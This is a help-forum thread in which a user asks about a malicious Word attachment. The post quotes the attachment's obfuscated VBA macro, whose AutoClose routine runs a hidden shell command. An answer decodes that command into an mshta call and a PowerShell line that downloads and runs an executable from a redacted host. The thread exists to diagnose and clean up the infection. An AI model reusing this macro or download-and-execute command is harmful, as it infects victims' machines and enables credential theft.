Opened malicious word attachment
January 15, 2018 12:16 PM   Subscribe

MS Word 365. We got an email with a word document that asked to "enable content" to actually see the contents. We did not actually click the "enable contents" button in the yellow bar, but did click the "enable editing" button. Googlefu says not to click. The contents is obfuscated. Norton is running and did not complain. How freaked out should we be?

Virus total found 10/60 postives
Probably W97Obfuscated

OLE Compound File Info
May try to run other files, shell commands or applications.
--Seems to contain deobfuscation code.
--Makes use of macros
--Macros And VBA Code Streams

Private Function undertake(uncourting)
tufting = Array("c", "o", "i", "p", "y", "M", "W", "1", "u", "h", "E", "g", "V", "D", "l", "f", "5", "m", "7", "H", "r", "J", "4", "9", "G", "8", "t", "d")
antilithic = Array(".", "c", "j", "/", "f", "=", "n", "p", "h", ":", "m", "q", "o", "a", "i", "w", "?", "G", "P", "d", " ", "s", "x", "e", "k", "R", "u", "t")

berghaan = vbNullString

For Each ridder In uncourting
flameflower = boarwood(ridder, tufting)
If flameflower > -1 Then
berghaan = antilithic(flameflower) + berghaan
End If

undertake = StrReverse(berghaan)

End Function

Public Function boarwood(annuals, reverberates)
fizzle = 5521
proctor = 7919
For fizzle = 0 To UBound(reverberates)
If reverberates(fizzle) = annuals And fizzle > -1 Then
proctor = fizzle
End If

If proctor = 7919 Then
proctor = -1
End If

boarwood = proctor
End Function

Sub AutoClose()
uncourting = Array("E", "J", "u", "d", "D", "c", "9", "4", "9", "r", "u", "d", "d", "1", "h", "p", "p", "l", "i", "H", "g", "W", "f", "H", "g", "t", "f", "H", "V", "D", "J", "l", "H", "i", "c", "o", "V", "E", "p", "8", "7", "m", "p", "J", "V", "y", "c", "1", "u", "1", "5", "t", "d", "E", "D", "M", "V", "1", "J", "G")
pidginize = undertake(uncourting)

Application.Run "hoodlum", (pidginize)

End Sub

Private Sub hoodlum(exchangers)

medicant = 16202
ectepicondylar = True

While ectepicondylar
peripatecically = medicant + 717
If peripatecically - medicant > 1 Then
stricken = precompact + "ll"
Call VBA.Shell(exchangers, vbNormalFocus - 1)
ectepicondylar = False
End If


End Sub
posted by nostrada to Computers & Internet (4 answers total)
Happened to me recently, I'd suggest to back up your data, then reinstall Windows. The virus I was dealing with was known to hijack browsers going to online banking websites, redirecting them to fake bank websites where they would then harvest the username and login. To be doubly safe, don't log into anything from the affected computer and change all your banking and other sensitive passwords from a different computer.
posted by pravit at 1:07 PM on January 15, 2018 [1 favorite]

I would make that backup on fresh media so you don't overwrite the previous backup.
posted by amtho at 1:18 PM on January 15, 2018

Well... it runs the command "mshta.exe http://*notshown*.com/RPG/sof.php?utma=opsk" (in the background) which leads to a webpage that tries to construct and run an ActiveX script.

The activeX script does this: powershell -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile(\'http://*notshown*.com/RPG/opsk.pfx\', $env:APPDATA + \'\\\\fbe24138.exe\'); Start-Process $env:APPDATA\'\\\\fbe24138.exe\'; (New-Object System.Net.WebClient).DownloadString(\'http://*notshown*.com/s.php?id=opsk\');

So if it was successful there's a file (or more files if it replicated) in your APPDATA folder that you need to delete (you'd probably also see that fbe24138.exe file running in task manager or other similar named files)

Don't know if this really helps. Didn't want to paste the full *notshown* URL but if you're really curious I can give it to you, though I don't recommend going there...
posted by one4themoment at 1:20 PM on January 15, 2018 [3 favorites]

Response by poster: Awesome. Thanks so much, one4themoment.
posted by nostrada at 2:38 PM on January 15, 2018

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